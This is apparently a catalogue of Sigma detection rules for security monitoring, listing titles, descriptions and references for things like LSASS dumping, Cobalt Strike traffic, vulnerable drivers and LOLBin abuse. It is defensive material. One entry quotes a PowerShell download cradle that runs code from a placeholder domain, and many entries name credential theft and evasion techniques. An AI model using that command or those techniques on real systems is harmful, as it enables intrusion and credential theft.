App Permissions Granted For Other APIs |
Detects when app permissions (app roles) for other APIs are granted |
https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions |
Edit of .bash_profile and .bashrc |
Detects change of user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell. |
MITRE Attack technique T1156; .bash_profile and .bashrc. |
OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd |
Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. |
https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059 |
User Added To Admin Group - MacOS |
Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. |
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos, https://ss64.com/osx/dscl.html, https://ss64.com/osx/sysadminctl.html |
Brute Force |
Detects many authentication failures from one source to one destination, which may indicate brute force activity |
None |
Domestic Kitten FurBall Malware Pattern |
Detects specific malware patterns used by FurBall malware linked to Iranian Domestic Kitten APT group |
https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/ |
CobaltStrike Malleable Amazon Browsing Traffic Profile |
Detects Malleable Amazon Profile |
https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile, https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100 |
CobaltStrike Malformed UAs in Malleable Profiles |
Detects different malformed user agents used in Malleable Profiles used with Cobalt Strike |
https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/ |
CobaltStrike Malleable (OCSP) Profile |
Detects Malleable (OCSP) Profile with Typo (OSCP) in URL |
https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile |
CobaltStrike Malleable OneDrive Browsing Traffic Profile |
Detects Malleable OneDrive Profile |
https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile |
iOS Implant URL Pattern |
Detects URL pattern used by iOS Implant |
https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html, https://twitter.com/craiu/status/1167358457344925696 |
Search-ms and WebDAV Suspicious Indicators in URL |
Detects URL pattern used by search(-ms)/WebDAV initial access campaigns. |
https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462 |
Suspicious Remote Thread Target |
Offensive tradecraft is switching away from using APIs like "CreateRemoteThread"; however, this is still largely observed in the wild. This rule aims to detect suspicious processes (those we would not expect to behave in this way, like winword.exe or outlook.exe) creating remote threads on other processes. It is a generic rule, but it should have a low FP ratio due to the selected range of processes. |
https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/ |
Credential Dumping Tools Service Execution |
Detects well-known credential dumping tools execution via service execution events |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
Usage Of Malicious POORTRY Signed Driver |
Detects the load of the signed poortry driver used by UNC3944 as reported by Mandiant and Sentinel One. |
https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware |
PowerShell Scripts Run by a Services |
Detects powershell script installed as a Service |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse |
Vulnerable AVAST Anti Rootkit Driver Load |
Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products |
https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/ |
Vulnerable Dell BIOS Update Driver Load |
Detects the load of the vulnerable Dell BIOS update driver as reported in CVE-2021-21551 |
https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/ |
Vulnerable Driver Load By Name |
Detects the load of known vulnerable drivers via their names only. |
https://loldrivers.io/ |
Vulnerable GIGABYTE Driver Load |
Detects the load of a signed and vulnerable GIGABYTE driver often used by threat actors or malware for privilege escalation |
https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b, https://twitter.com/malmoeb/status/1551449425842786306, https://github.com/fengjixuchui/gdrv-loader, https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details, https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details |
Vulnerable HW Driver Load |
Detects the load of a legitimate signed driver named HW.sys, often used by threat actors or malware for privilege escalation |
https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/, https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details |
Vulnerable Lenovo Driver Load |
Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges |
https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities, https://github.com/alfarom256/CVE-2022-3699/ |
Suspicious File Event With Teams Objects |
Detects an access to authentication tokens and accounts of Microsoft Teams desktop application. |
https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens |
Suspicious Unattend.xml File Access |
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended Windows install process. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md |
CrackMapExec File Creation Patterns |
Detects suspicious file creation patterns found in logs when CrackMapExec is used |
https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass |
LSASS Memory Dump File Creation |
LSASS memory dump creation using operating systems utilities. Procdump will use process name in output file if no name is specified |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment |
CreateMiniDump Hacktool |
Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine |
https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass |
Mimikatz MemSSP Default Log File Creation |
Detects Mimikatz MemSSP default log file creation |
https://pentestlab.blog/2019/10/21/persistence-security-support-provider/ |
Alternate PowerShell Hosts - Image |
Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe |
https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html |
Suspicious CLR Logs Creation |
Detects suspicious .NET assembly executions. Could detect using Cobalt Strike's command execute-assembly. |
https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html, https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/, https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml |
Suspicious Load of Advapi31.dll |
Detects the load of advapi31.dll by a process running in an uncommon folder |
https://github.com/hlldz/Phant0m |
SCM DLL Sideload |
Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system |
https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 |
Svchost DLL Search Order Hijack |
Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exist on a typical modern system. The IKEEXT and SessionEnv services call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services ("svchost.exe -k netsvcs") to gain code execution on a remote machine. |
https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992 |
Possible Process Hollowing Image Loading |
Detects loading of samlib.dll or WinSCard.dll from an atypical process, e.g. through process hollowing by Mimikatz |
https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html |
Windows Management Instrumentation DLL Loaded Via Microsoft Word |
Detects DLLs loaded via Word containing VBA macros executing WMI commands |
https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16, https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/, https://media.cert.europa.eu/static/SecurityAdvisories/2019/CERT-EU-SA2019-021.pdf |
Microsoft Binary Github Communication |
Detects an executable in the Windows folder accessing github.com |
https://twitter.com/M_haggis/status/900741347035889665, https://twitter.com/M_haggis/status/1032799638213066752, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1 |
Suspicious Non-Browser Network Communication With Reddit API |
Detects a non-browser process interacting with the Reddit API, which could indicate use of a covert C2 such as RedditC2 |
https://github.com/kleiton0x00/RedditC2, https://twitter.com/kleiton0x7e/status/1600567316810551296, https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al |
Suspicious Epmap Connection |
Detects suspicious "epmap" connection to a remote computer via remote procedure call (RPC) |
https://github.com/RiccardoAncarani/TaskShell/ |
PsExec Pipes Artifacts |
Detects use of PsExec via pipe creation or access to its named pipes |
https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view |
Netcat The Powershell Version - PowerShell Module |
Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network |
https://nmap.org/ncat/, https://github.com/besimorhino/powercat, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md |
Accessing Encrypted Credentials from Google Chrome Login Database |
Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md |
AzureHound PowerShell Commands |
Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound |
https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html |
Execution via CL_Invocation.ps1 - Powershell |
Detects Execution via SyncInvoke in CL_Invocation.ps1 module |
https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424 |
Execution via CL_Mutexverifiers.ps1 |
Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module |
https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/, https://twitter.com/pabraeken/status/995111125447577600 |
Powershell File and Directory Discovery |
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md |
Dnscat Execution |
Dnscat exfiltration tool execution |
None |
PrintNightmare Powershell Exploitation |
Detects Commandlet name for PrintNightmare exploitation. |
https://github.com/calebstewart/CVE-2021-1675 |
Suspicious Get-WmiObject |
The infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers |
https://attack.mitre.org/datasources/DS0005/, https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7 |
Suspicious PowerShell Download |
Detects suspicious PowerShell download command |
None |
Suspicious PowerShell Invocations - Generic |
Detects suspicious PowerShell invocation command parameters |
None |
Suspicious PowerShell Invocations - Specific |
Detects suspicious PowerShell invocation command parameters |
None |
SyncAppvPublishingServer Execution to Bypass Powershell Restriction |
Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions. |
https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/ |
Suspicious In-Memory Module Execution |
Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a DLL loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see so few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown), which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious. |
https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/ |
Credential Dumping by LaZagne |
Detects LSASS process access by LaZagne for credential dumping. |
https://twitter.com/bh4b3sh/status/1303674603819081728 |
Credential Dumping Tools Accessing LSASS Memory |
Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools |
https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf |
Credential Dumping by Pypykatz |
Detects LSASS process access by pypykatz for credential dumping. |
https://github.com/skelsec/pypykatz |
Potential NT API Stub Patching |
Detects potential NT API stub patching as seen used by the project PatchingAPI |
https://web.archive.org/web/20230106211702/https://github.com/D1rkMtr/UnhookingPatch, https://twitter.com/D1rkMtr/status/1611471891193298944?s=20 |
APT29 |
This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. |
https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/, https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html |
CrackMapExecWin |
Detects CrackMapExecWin Activity as Described by NCSC |
https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control, https://attack.mitre.org/software/S0488/ |
GALLIUM Artefacts |
Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. |
https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11) |
Suspicious Certutil Command Usage |
Detects a suspicious Microsoft certutil execution with sub commands like 'decode', which is sometimes used to decode malicious code |
https://twitter.com/JohnLaTwC/status/835149808817991680, https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/, https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/ |
Hurricane Panda Activity |
Detects Hurricane Panda Activity |
https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/ |
Lazarus Activity Apr21 |
Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity |
https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/ |
Lazarus Loaders |
Detects different loaders as described in various threat reports on Lazarus group activity |
https://www.hvs-consulting.de/lazarus-report/, https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/ |
DNS Tunnel Technique from MuddyWater |
Detecting DNS tunnel activity for Muddywater actor |
https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/, https://www.vmray.com/analyses/5ad401c3a568/report/overview.html |
TA505 Dropper Load Pattern |
Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents |
https://twitter.com/ForensicITGuy/status/1334734244120309760 |
Read and Execute a File Via Cmd.exe |
Detect use of "/R <" to read and execute a file via cmd.exe |
https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md |
Cmd Stream Redirection |
Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt |
Credential Acquisition via Registry Hive Dumping |
Detects Credential Acquisition via Registry Hive Dumping |
https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html |
Visual Basic Script Execution |
Adversaries may abuse Visual Basic (VB) for execution |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md |
Execution via MSSQL Xp_cmdshell Stored Procedure |
Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default. |
https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html |
Indirect Command Execution via Forfiles |
Detects execution of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting. |
https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a, https://lolbas-project.github.io/lolbas/Binaries/Forfiles/ |
Indirect Command Execution |
Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md, https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html |
Invoke-Obfuscation RUNDLL LAUNCHER |
Detects Obfuscated Powershell via RUNDLL LAUNCHER |
https://github.com/SigmaHQ/sigma/issues/1009 |
Invoke-Obfuscation Via Use Rundll32 |
Detects Obfuscated Powershell via use Rundll32 in Scripts |
https://github.com/SigmaHQ/sigma/issues/1009 |
New Lolbin Process by Office Applications |
This rule will monitor any Office apps that spin up a new LOLBin process. This activity is pretty suspicious and should be investigated. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml, https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A, https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set |
Monitoring Wuauclt.exe For Lolbas Execution Of DLL |
Adversaries can abuse wuauclt.exe (Windows Update client) to execute code by specifying an arbitrary DLL. |
https://dtm.uk/wuauclt/ |
Abusing Findstr for Defense Evasion |
Attackers can use findstr to hide their artifacts or search for specific strings and evade defense mechanisms |
https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f |
Suspicious File Download Using Office Application |
Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files |
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/, https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191 |
Execute MSDT.EXE Using Diagcab File |
Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190 |
https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0, https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd |
Ryuk Ransomware Command Line Activity |
Detects Ryuk Ransomware command lines |
https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/ |
MavInject Process Injection |
Detects process injection using the signed Windows tool Mavinject32.exe |
https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152 |
Process Memory Dumped Via RdrLeakDiag.EXE |
Detects use of the rdrleakdiag.exe LOLBIN utility to dump process memory |
https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/ |
Trickbot Malware Reconnaissance Activity |
Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. |
https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ |
New Service Creation |
Detects creation of a new service. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md |
Nslookup PwSh Download Cradle |
This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] |
https://twitter.com/alh4zr3d/status/1566489367232651264 |
Application Whitelisting Bypass via DLL Loaded by odbcconf.exe |
Detects defence evasion attempt via odbcconf.exe execution to load DLL |
https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://twitter.com/Hexacorn/status/1187143326673330176, https://redcanary.com/blog/raspberry-robin/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca |
Excel Proxy Executing Regsvr32 With Payload |
Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Excel Proxy Executing Regsvr32 With Payload Alternate |
Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes. |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Office Applications Spawning Wmi Cli Alternate |
Initial execution of malicious document calls wmic to execute the file with regsvr32 |
https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml |
Possible Applocker Bypass |
Detects execution of executables that can be used to bypass Applocker whitelisting |
https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt, https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md |
PowerShell AMSI Bypass Pattern |
Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. |
https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/ |
Base64 Encoded Listing of Shadowcopy |
Detects base64 encoded listing Win32_Shadowcopy |
https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar |
Malicious Base64 Encoded Powershell Invoke Cmdlets |
Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets |
https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ |
Potential PowerShell Base64 Encoded Shellcode |
Detects potential powershell Base64 encoded Shellcode |
https://twitter.com/cyb3rops/status/1063072865992523776 |
Suspicious Bitsadmin Job via PowerShell |
Detect download by BITS jobs via PowerShell |
https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md |
Stop Or Remove Antivirus Service |
Detects usage of the 'Stop-Service' or 'Remove-Service' PowerShell cmdlets to disable AV services. Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping the antivirus service. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/ |
Potential Xor Encoded PowerShell Command |
Detects usage of "xor" or "bxor" in combination with a "foreach" loop. This pattern is often found in encoded PowerShell code and commands as a way to avoid detection |
https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 |
Regsvr32 Anomaly |
Detects various anomalies in relation to regsvr32.exe |
https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ |
Registry Dump of SAM Creds and Secrets |
Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets |
Renamed PaExec Execution |
Detects execution of renamed paexec via imphash and executable product string |
sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc, https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf |
Renamed PsExec |
Detects the execution of a renamed PsExec, often used by attackers or malware |
https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks |
Renamed PowerShell |
Detects the execution of a renamed PowerShell, often used by attackers or malware |
https://twitter.com/christophetd/status/1164506034720952320 |
Renamed Rundll32.exe Execution |
Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection |
https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/ |
Root Certificate Installed |
Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md |
Rundll32 JS RunHTMLApplication Pattern |
Detects suspicious command line patterns used when rundll32 is used to run JavaScript code |
http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt, https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt |
Suspicious Rundll32 Script in CommandLine |
Detects suspicious process related to rundll32 based on arguments |
https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52, https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md |
Run from a Zip File |
Payloads may be compressed, archived, or encrypted in order to avoid detection |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file |
Suspicious Add Scheduled Task From User AppData Temp |
Detects schtasks.exe creating a task from the user's AppData\Local\Temp directory |
